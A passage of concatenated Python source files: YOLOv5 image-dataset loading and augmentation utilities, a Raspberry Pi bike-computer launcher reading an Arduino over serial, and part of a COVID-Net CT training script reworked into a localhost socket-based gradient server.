else:
# Load image
img, (h0, w0), (h, w) = self.load_image(index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
nl = len(labels) # number of labels
if nl:
labels[:, 1:5] = xyxy2xywhn(labels[:, 1:5], w=img.shape[1], h=img.shape[0], clip=True, eps=1E-3)
if self.augment:
# Albumentations
img, labels = self.albumentations(img, labels)
nl = len(labels) # update after albumentations
# HSV color-space
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nl:
labels[:, 2] = 1 - labels[:, 2]
# Flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nl:
labels[:, 1] = 1 - labels[:, 1]
# Cutouts
# labels = cutout(img, labels, p=0.5)
# nl = len(labels) # update after cutout
labels_out = torch.zeros((nl, 6))
if nl:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.im_files[index], shapes
def load_image(self, i):
# Loads 1 image from dataset index 'i', returns (im, original hw, resized hw)
im, f, fn = self.ims[i], self.im_files[i], self.npy_files[i],
if im is None: # not cached in RAM
if fn.exists(): # load npy
im = np.load(fn)
else: # read image
im = cv2.imread(f) # BGR
assert im is not None, f'Image Not Found {f}'
h0, w0 = im.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # ratio
if r != 1: # if sizes are not equal
im = cv2.resize(im,
(int(w0 * r), int(h0 * r)),
interpolation=cv2.INTER_LINEAR if (self.augment or r > 1) else cv2.INTER_AREA)
return im, (h0, w0), im.shape[:2] # im, hw_original, hw_resized
else:
return self.ims[i], self.im_hw0[i], self.im_hw[i] # im, hw_original, hw_resized
def cache_images_to_disk(self, i):
# Saves an image as an *.npy file for faster loading
f = self.npy_files[i]
if not f.exists():
np.save(f.as_posix(), cv2.imread(self.im_files[i]))
def load_mosaic(self, index):
# YOLOv5 4-mosaic loader. Loads 1 image + 3 random images into a 4-image mosaic
labels4, segments4 = [], []
s = self.img_size
yc, xc = (int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border) # mosaic center x, y
indices = [index] + random.choices(self.indices, k=3) # 3 additional image indices
random.shuffle(indices)
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = self.load_image(index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4, segments4 = copy_paste(img4, labels4, segments4, p=self.hyp['copy_paste'])
img4, labels4 = random_perspective(img4, labels4, segments4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# YOLOv5 9-mosaic loader. Loads 1 image + 8 random images into a 9-image mosaic
labels9, segments9 = [], []
s = self.img_size
indices = [index] + random.choices(self.indices, k=8) # 8 additional image indices
random.shuffle(indices)
hp, wp = -1, -1 # height, width previous
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = self.load_image(index)
# place img in img9
if i == 0: # center
img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = (max(x, 0) for x in c) # allocate coords
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
labels9.append(labels)
segments9.extend(segments)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = (int(random.uniform(0, s)) for _ in self.mosaic_border) # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
c = np.array([xc, yc]) # centers
segments9 = [x - c for x in segments9]
for x in (labels9[:, 1:], *segments9):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(img9, labels9, segments9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
@staticmethod
def collate_fn(batch):
im, label, path, shapes = zip(*batch) # transposed
for i, lb in enumerate(label):
lb[:, 0] = i # add target image index for build_targets()
return torch.stack(im, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
im4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0.0, 0, 0, 1, 0, 0]])
wo = torch.tensor([[0.0, 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, 0.5, 0.5, 0.5, 0.5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2.0, mode='bilinear', align_corners=False)[
0].type(img[i].type())
lb = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
lb = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
im4.append(im)
label4.append(lb)
for i, lb in enumerate(label4):
lb[:, 0] = i # add target image index for build_targets()
return torch.stack(im4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path=DATASETS_DIR / 'coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(str(path) + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path=DATASETS_DIR / 'coco128'): # from utils.datasets import *; extract_boxes()
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in IMG_FORMATS:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file) as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path=DATASETS_DIR / 'coco128/images', weights=(0.9, 0.1, 0.0), annotated_only=False):
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
Usage: from utils.datasets import *; autosplit()
Arguments
path: Path to images directory
weights: Train, val, test weights (list, tuple)
annotated_only: Only use images with an annotated txt file
"""
path = Path(path) # images dir
files = sorted(x for x in path.rglob('*.*') if x.suffix[1:].lower() in IMG_FORMATS) # image files only
n = len(files) # number of files
random.seed(0) # for reproducibility
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path.parent / x).unlink(missing_ok=True) for x in txt] # remove existing
print(f'Autosplitting images from {path}' + ', using *.txt labeled images only' * annotated_only)
for i, img in tqdm(zip(indices, files), total=n):
if not annotated_only or Path(img2label_paths([str(img)])[0]).exists(): # check label
with open(path.parent / txt[i], 'a') as f:
f.write('./' + img.relative_to(path.parent).as_posix() + '\n') # add image to txt file
def verify_image_label(args):
# Verify one image-label pair
im_file, lb_file, prefix = args
nm, nf, ne, nc, msg, segments = 0, 0, 0, 0, '', [] # number (missing, found, empty, corrupt), message, segments
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
assert im.format.lower() in IMG_FORMATS, f'invalid image format {im.format}'
if im.format.lower() in ('jpg', 'jpeg'):
with open(im_file, 'rb') as f:
f.seek(-2, 2)
if f.read() != b'\xff\xd9': # corrupt JPEG
ImageOps.exif_transpose(Image.open(im_file)).save(im_file, 'JPEG', subsampling=0, quality=100)
msg = f'{prefix}WARNING: {im_file}: corrupt JPEG restored and saved'
# verify labels
if os.path.isfile(lb_file):
nf = 1 # label found
with open(lb_file) as f:
lb = [x.split() for x in f.read().strip().splitlines() if len(x)]
if any([len(x) > 8 for x in lb]): # is segment
classes = np.array([x[0] for x in lb], dtype=np.float32)
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in lb] # (cls, xy1...)
lb = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
lb = np.array(lb, dtype=np.float32)
nl = len(lb)
if nl:
assert lb.shape[1] == 5, f'labels require 5 columns, {lb.shape[1]} columns detected'
assert (lb >= 0).all(), f'negative label values {lb[lb < 0]}'
assert (lb[:, 1:] <= 1).all(), f'non-normalized or out of bounds coordinates {lb[:, 1:][lb[:, 1:] > 1]}'
_, i = np.unique(lb, axis=0, return_index=True)
if len(i) < nl: # duplicate row check
lb = lb[i] # remove duplicates
if segments:
segments = segments[i]
msg = f'{prefix}WARNING: {im_file}: {nl - len(i)} duplicate labels removed'
else:
ne = 1 # label empty
lb = np.zeros((0, 5), dtype=np.float32)
else:
nm = 1 # label missing
lb = np.zeros((0, 5), dtype=np.float32)
return im_file, lb, shape, segments, nm, nf, ne, nc, msg
except Exception as e:
nc = 1
msg = f'{prefix}WARNING: {im_file}: ignoring corrupt image/label: {e}'
return [None, None, None, None, nm, nf, ne, nc, msg]
def dataset_stats(path='coco128.yaml', autodownload=False, verbose=False, profile=False, hub=False):
""" Return dataset statistics dictionary with images and instances counts per split per class
To run in parent directory: export PYTHONPATH="$PWD/yolov5"
Usage1: from utils.datasets import *; dataset_stats('coco128.yaml', autodownload=True)
Usage2: from utils.datasets import *; dataset_stats('path/to/coco128_with_yaml.zip')
Arguments
path: Path to data.yaml or data.zip (with data.yaml inside data.zip)
autodownload: Attempt to download dataset if not found locally
verbose: Print stats dictionary
"""
def round_labels(labels):
# Update labels to integer class and 6 decimal place floats
return [[int(c), *(round(x, 4) for x in points)] for c, *points in labels]
def unzip(path):
# Unzip data.zip TODO: CONSTRAINT: path/to/abc.zip MUST unzip to 'path/to/abc/'
if str(path).endswith('.zip'): # path is data.zip
assert Path(path).is_file(), f'Error unzipping {path}, file not found'
ZipFile(path).extractall(path=path.parent) # unzip
dir = path.with_suffix('') # dataset directory == zip name
return True, str(dir), next(dir.rglob('*.yaml')) # zipped, data_dir, yaml_path
else: # path is data.yaml
return False, None, path
def hub_ops(f, max_dim=1920):
# HUB ops for 1 image 'f': resize and save at reduced quality in /dataset-hub for web/app viewing
f_new = im_dir / Path(f).name # dataset-hub image filename
try: # use PIL
im = Image.open(f)
r = max_dim / max(im.height, im.width) # ratio
if r < 1.0: # image too large
im = im.resize((int(im.width * r), int(im.height * r)))
im.save(f_new, 'JPEG', quality=75, optimize=True) # save
except Exception as e: # use OpenCV
print(f'WARNING: HUB ops PIL failure {f}: {e}')
im = cv2.imread(f)
im_height, im_width = im.shape[:2]
r = max_dim / max(im_height, im_width) # ratio
if r < 1.0: # image too large
im = cv2.resize(im, (int(im_width * r), int(im_height * r)), interpolation=cv2.INTER_AREA)
cv2.imwrite(str(f_new), im)
zipped, data_dir, yaml_path = unzip(Path(path))
with open(check_yaml(yaml_path), errors='ignore') as f:
data = yaml.safe_load(f) # data dict
if zipped:
data['path'] = data_dir # TODO: should this be dir.resolve()?
check_dataset(data, autodownload) # download dataset if missing
hub_dir = Path(data['path'] + ('-hub' if hub else ''))
stats = {'nc': data['nc'], 'names': data['names']} # statistics dictionary
for split in 'train', 'val', 'test':
if data.get(split) is None:
stats[split] = None # i.e. no test set
continue
x = []
dataset = LoadImagesAndLabels(data[split]) # load dataset
for label in tqdm(dataset.labels, total=dataset.n, desc='Statistics'):
x.append(np.bincount(label[:, 0].astype(int), minlength=data['nc']))
x = np.array(x) # shape(128x80)
stats[split] = {'instance_stats': {'total': int(x.sum()), 'per_class': x.sum(0).tolist()},
'image_stats': {'total': dataset.n, 'unlabelled': int(np.all(x == 0, 1).sum()),
'per_class': (x > 0).sum(0).tolist()},
'labels': [{str(Path(k).name): round_labels(v.tolist())} for k, v in
zip(dataset.im_files, dataset.labels)]}
if hub:
im_dir = hub_dir / 'images'
im_dir.mkdir(parents=True, exist_ok=True)
for _ in tqdm(ThreadPool(NUM_THREADS).imap(hub_ops, dataset.im_files), total=dataset.n, desc='HUB Ops'):
pass
# Profile
stats_path = hub_dir / 'stats.json'
if profile:
for _ in range(1):
file = stats_path.with_suffix('.npy')
t1 = time.time()
np.save(file, stats)
t2 = time.time()
x = np.load(file, allow_pickle=True)
print(f'stats.npy times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')
file = stats_path.with_suffix('.json')
t1 = time.time()
with open(file, 'w') as f:
json.dump(stats, f) # save stats *.json
t2 = time.time()
with open(file) as f:
x = json.load(f) # load hyps dict
print(f'stats.json times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')
# Save, print and return
if hub:
print(f'Saving {stats_path.resolve()}...')
with open(stats_path, 'w') as f:
json.dump(stats, f) # save stats.json
if verbose:
print(json.dumps(stats, indent=2, sort_keys=False))
return stats
|
main.py
|
#!~/bike-computer/.venv/bin python
import serial
import serial.tools.list_ports
from multiprocessing import Process
import subprocess
import tkinter as tk
import dashboard
import interpreter
def runScript(script_name):
subprocess.run(["python",script_name])
if __name__ == '__main__':
p = Process(target=runScript, args=('/home/pi/bike-computer/firmware/camera.py',))
p.start()
ports = serial.tools.list_ports.comports()
for port, desc, hwid in sorted(ports):
if desc=="Arduino Micro":
print("{}: {} [{}]".format(port, desc, hwid))
break
arduino = serial.Serial(port, 115200, timeout=0.1, write_timeout=0)
path = '~/bike-computer/data/'
intrptr = interpreter.Interpreter(arduino,path)
root = tk.Tk()
dbg = dashboard.DashboardGUI(root, intrptr)
root.overrideredirect(True)
root.after(1, dbg.update_display)
root.mainloop()
|
run_covidnet_ct_2_lps.py
|
"""
Training/testing/inference script for COVID-Net CT models for COVID-19 detection in CT images.
"""
import os
import sys
import time
import cv2
import json
import shutil
import numpy as np
from math import ceil
import tensorflow as tf
import matplotlib.pyplot as plt
from sklearn.metrics import confusion_matrix, ConfusionMatrixDisplay
from dataset import COVIDxCTDataset
from data_utils import auto_body_crop
from utils import parse_args
import pickle as pickle
import socket
from multiprocessing import Process, Queue, Value, Manager
from ctypes import c_char_p
# Dict keys
TRAIN_OP_KEY = 'train_op'
TF_SUMMARY_KEY = 'tf_summaries'
LOSS_KEY = 'loss'
# Tensor names
IMAGE_INPUT_TENSOR = 'Placeholder:0'
LABEL_INPUT_TENSOR = 'Placeholder_1:0'
CLASS_PRED_TENSOR = 'ArgMax:0'
CLASS_PROB_TENSOR = 'softmax_tensor:0'
TRAINING_PH_TENSOR = 'is_training:0'
LOSS_TENSOR = 'add:0'
# Names for train checkpoints
CKPT_NAME = 'model.ckpt'
MODEL_NAME = 'COVID-Net_CT'
# Output directory for storing runs
OUTPUT_DIR = 'output'
# Class names ordered by class index
CLASS_NAMES = ('Normal', 'Pneumonia', 'COVID-19')
TCP_IP = '127.0.0.1'
port = 17000
num_iters = 260
s = 0
MAX_WORKERS = 1
global_var_vals = None
def safe_recv(size, server_socket):
data = bytearray()
while 1:
try:
temp = server_socket.recv(size - len(data))
data.extend(temp)
recv_size = len(data)
if recv_size >= size:
break
except:
print("Error")
data = bytes(data)
return data
def handleWorker(port, gradients_q, done_flag, global_var_vals, ack_q, n):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Connecting to port : ", port)
s.bind((TCP_IP, port))
s.listen(1)
conn, addr = s.accept()
print('Connection address:', addr)
k = 0
while 1:
size = safe_recv(17, conn)
size = pickle.loads(size)
data = safe_recv(size, conn)
# print("Received size: ", size)
local_worker_gradients = pickle.loads(data)
# print(local_worker_gradients)
gradients_q.put(local_worker_gradients)
while (done_flag.value == 0):
pass
size = len(global_var_vals.value)
size = pickle.dumps(size, pickle.HIGHEST_PROTOCOL)
conn.sendall(size)
print("Send size: "+str(len(size)))
conn.sendall(global_var_vals.value)
ack_q.put(1)
k = k + 1
# print("Worker: ", k)
if (k == (n + 1)):
print("Working: Breaking from loop")
break
conn.close()
s.close()
def dense_grad_filter(gvs):
"""Filter to apply gradient updates to dense layers only"""
return [(g, v) for g, v in gvs if 'dense' in v.name]
def simple_summary(tag_to_value, tag_prefix=''):
"""Summary object for a dict of python scalars"""
return tf.Summary(value=[tf.Summary.Value(tag=tag_prefix + tag, simple_value=value)
for tag, value in tag_to_value.items() if isinstance(value, (int, float))])
def create_session():
"""Helper function for session creation"""
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
return sess
def load_graph(meta_file):
"""Creates new graph and session"""
graph = tf.Graph()
with graph.as_default():
# Create session and load model
sess = create_session()
# Load meta file
print('Loading meta graph from ' + meta_file)
saver = tf.train.import_meta_graph(meta_file, clear_devices=True)
return graph, sess, saver
def load_ckpt(ckpt, sess, saver):
"""Helper for loading weights"""
# Load weights
if ckpt is not None:
print('Loading weights from ' + ckpt)
saver.restore(sess, ckpt)
def get_lr_scheduler(init_lr, global_step=None, decay_steps=None, schedule_type='cosine'):
if schedule_type == 'constant':
return init_lr
elif schedule_type == 'cosine_decay':
return tf.train.cosine_decay(init_lr, global_step, decay_steps)
elif schedule_type == 'exp_decay':
return tf.train.exponential_decay(init_lr, global_step, decay_steps)
class Metrics:
"""Lightweight class for tracking metrics"""
def __init__(self):
num_classes = len(CLASS_NAMES)
self.labels = list(range(num_classes))
self.class_names = CLASS_NAMES
self.confusion_matrix = np.zeros((num_classes, num_classes), dtype=np.uint32)
def update(self, y_true, y_pred):
self.confusion_matrix = self.confusion_matrix + confusion_matrix(y_true, y_pred, labels=self.labels)
def reset(self):
self.confusion_matrix *= 0
def values(self):
conf_matrix = self.confusion_matrix.astype('float')
metrics = {
'accuracy': np.diag(conf_matrix).sum() / conf_matrix.sum(),
'confusion matrix': self.confusion_matrix.copy()
}
sensitivity = np.diag(conf_matrix) / np.maximum(conf_matrix.sum(axis=1), 1)
pos_pred_val = np.diag(conf_matrix) / np.maximum(conf_matrix.sum(axis=0), 1)
for cls, idx in zip(self.class_names, self.labels):
metrics['{} {}'.format(cls, 'sensitivity')] = sensitivity[idx]
metrics['{} {}'.format(cls, 'PPV')] = pos_pred_val[idx]
return metrics
class COVIDNetCTRunner:
"""Primary training/testing/inference class"""
def __init__(self, meta_file, ckpt=None, data_dir=None, input_height=512, input_width=512,
lr=0.001, momentum=0.9, fc_only=False, max_bbox_jitter=0.025, max_rotation=10,
max_shear=0.15, max_pixel_shift=10, max_pixel_scale_change=0.2):
self.meta_file = meta_file
self.ckpt = ckpt
self.input_height = input_height
self.input_width = input_width
if data_dir is None:
self.dataset = None
else:
self.dataset = COVIDxCTDataset(
data_dir,
image_height=input_height,
image_width=input_width,
max_bbox_jitter=max_bbox_jitter,
max_rotation=max_rotation,
max_shear=max_shear,
max_pixel_shift=max_pixel_shift,
max_pixel_scale_change=max_pixel_scale_change
)
# Load graph/checkpoint and add optimizer
self.graph, self.sess, self.saver = load_graph(self.meta_file)
with self.graph.as_default():
# self.train_op = self._add_optimizer(lr, momentum, fc_only)
# self.grads = self.get_gradients(lr, momentum)
# self.only_gradients = [g for g, _ in self.grads]
self.placeholder_gradients = []
for var in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES):
self.placeholder_gradients.append((tf.placeholder('float', shape=var.get_shape()), var))
# print(self.placeholder_gradients)
self.apply_grads = self.apply_gradients(lr, momentum, self.placeholder_gradients, fc_only)
# Initialize
self.sess.run(tf.global_variables_initializer())
load_ckpt(self.ckpt, self.sess, self.saver)
def trainval(self, epochs, output_dir, batch_size=1, train_split_file='train.txt', val_split_file='val.txt',
log_interval=20, val_interval=1000, save_interval=1000):
"""Run training with intermittent validation"""
ckpt_path = os.path.join(output_dir, CKPT_NAME)
with self.graph.as_default():
# Copy original graph without optimizer
# shutil.copy(self.meta_file, output_dir)
# Create train dataset
# dataset, num_images, batch_size = self.dataset.train_dataset(train_split_file, batch_size)
# data_next = dataset.make_one_shot_iterator().get_next()
# num_iters = ceil(num_images / batch_size) * epochs
# Create feed and fetch dicts
# feed_dict = {TRAINING_PH_TENSOR: True}
# fetch_dict = {
# TRAIN_OP_KEY: self.train_op,
# TRAIN_OP_KEY: self.only_gradients,
# LOSS_KEY: LOSS_TENSOR
# }
# Add summaries
# summary_writer = tf.summary.FileWriter(os.path.join(output_dir, 'events'), self.graph)
# fetch_dict[TF_SUMMARY_KEY] = self._get_train_summary_op()
# Create validation function
# run_validation = self._get_validation_fn(batch_size, val_split_file)
# Baseline saving and validation
# print('Saving baseline checkpoint')
# saver = tf.train.Saver()
# saver.save(self.sess, ckpt_path, global_step=0, write_meta_graph=False)
# print('Starting baseline validation')
# metrics = run_validation()
# self._log_and_print_metrics(metrics, 0, summary_writer)
feed_dict = {}
j = 0
for var in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES):
feed_dict[self.placeholder_gradients[j][0]] = np.zeros(self.placeholder_gradients[j][0].shape)
j = j + 1
# Training loop
print('Training with batch_size {} for {} steps'.format(batch_size, num_iters))
# s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# s.connect((TCP_IP, port))
global global_var_vals
global done_flag
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Connecting to port : ", port, " and no of workers: ", MAX_WORKERS)
s.bind((TCP_IP, port))
s.listen(5)
var_val = []
for v in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES):
var_val.append(self.sess.run(v, feed_dict=feed_dict))
# print("Var val:: ",var_val)
send_data = pickle.dumps(var_val, pickle.HIGHEST_PROTOCOL)
# print("Send the send_data:: ",send_data)
global_var_vals.value = send_data
size = len(send_data)
print("Send the size:: ", size)
size = pickle.dumps(size, pickle.HIGHEST_PROTOCOL)
# print("Send the size in bytes:: ",size)
for i in range(MAX_WORKERS):
conn, addr = s.accept()
# print("Conn: {}, Addr: {}".format(conn, addr))
conn.sendall(size)
# print("Sent Size")
conn.sendall(send_data)
conn.close()
s.close()
print("Sent initial var values to workers")
for i in range(num_iters):
print("iteration no: "+str(i))
step_time = time.time()
opt_time = 0
for w in range(MAX_WORKERS):
recv_grads = gradients_q.get()
# print(recv_grads)
opt_start = time.time()
feed_dict = {}
for j, grad_var in enumerate(recv_grads):
feed_dict[self.placeholder_gradients[j][0]] = recv_grads[j]
res = self.sess.run(self.apply_grads, feed_dict=feed_dict)
opt_time += time.time() - opt_start
print("Opt time " + str(opt_time))
other_start = time.time()
var_val = []
for v in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES):
# v_temp = self.sess.run(v, feed_dict=feed_dict)
v_temp = self.sess.run(v)
var_val.append(v_temp)
# print(var_val)
global_var_vals.value = pickle.dumps(var_val, pickle.HIGHEST_PROTOCOL)
print("Other time " + str(time.time() - other_start))
# print("New values of variables ready")
done_flag.value = 1
for i in range(MAX_WORKERS):
val = ack_q.get()
done_flag.value = 0
print("Step time " + str(time.time() - step_time))
# Run training step
# data = self.sess.run(data_next)
# feed_dict[IMAGE_INPUT_TENSOR] = data['image']
# feed_dict[LABEL_INPUT_TENSOR] = data['label']
# only_grads_val = self.sess.run(self.only_gradients, feed_dict=feed_dict)
# print(only_grads_val)
# results = self.sess.run(fetch_dict, feed_dict)
# only_grads_val = results[TRAIN_OP_KEY]
# only_grads_val = pickle.dumps(only_grads_val, pickle.HIGHEST_PROTOCOL)
# gradients_size = len(only_grads_val)
# gradients_size = pickle.dumps(gradients_size, pickle.HIGHEST_PROTOCOL)
# print("Size of gradients size; {}", gradients_size)
# s.sendall(gradients_size)
# s.sendall(only_grads_val)
# recv_size = safe_recv(17, s)
# recv_size = pickle.loads(recv_size)
# recv_data = safe_recv(recv_size, s)
# var_vals = pickle.loads(recv_data)
# print("recved grads")
# j = 0
# for v in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES):
# feed_dict[v] = var_vals[j]
# j = j + 1
# for j, grad_var in enumerate(only_grads_val):
# feed_dict[self.placeholder_gradients[j][0]] = only_grads_val[j]
# print(results)
# Log and save
# step = i + 1
# if step % log_interval == 0:
# summary_writer.add_summary(results[TF_SUMMARY_KEY], step)
# print('[step: {}, loss: {}]'.format(step, results[LOSS_KEY]))
# if step % save_interval == 0:
# print('Saving checkpoint at step {}'.format(step))
# saver.save(self.sess, ckpt_path, global_step=step, write_meta_graph=False)
# if val_interval > 0 and step % val_interval == 0:
# print('Starting validation at step {}'.format(step))
# metrics = run_validation()
# self._log_and_print_metrics(metrics, step, summary_writer)
# print('Saving checkpoint at last step')
# saver.save(self.sess, ckpt_path, global_step=num_iters, write_meta_graph=False)
def test(self, batch_size=1, test_split_file='test.txt', plot_confusion=False):
"""Run test on a checkpoint"""
with self.graph.as_default():
# Run test
print('Starting test')
metrics = self._get_validation_fn(batch_size, test_split_file)()
self._log_and_print_metrics(metrics)
if plot_confusion:
# Plot confusion matrix
fig, ax = plt.subplots()
disp = ConfusionMatrixDisplay(confusion_matrix=metrics['confusion matrix'],
display_labels=CLASS_NAMES)
disp.plot(include_values=True, cmap='Blues', ax=ax, xticks_rotation='horizontal', values_format='.5g')
plt.show()
def infer(self, image_file, autocrop=True):
"""Run inference on the given image"""
# Load and preprocess image
image = cv2.imread(image_file, cv2.IMREAD_GRAYSCALE)
if autocrop:
image, _ = auto_body_crop(image)
image = cv2.resize(image, (self.input_width, self.input_height), cv2.INTER_CUBIC)
image = image.astype(np.float32) / 255.0
image = np.expand_dims(np.stack((image, image, image), axis=-1), axis=0)
# Create feed dict
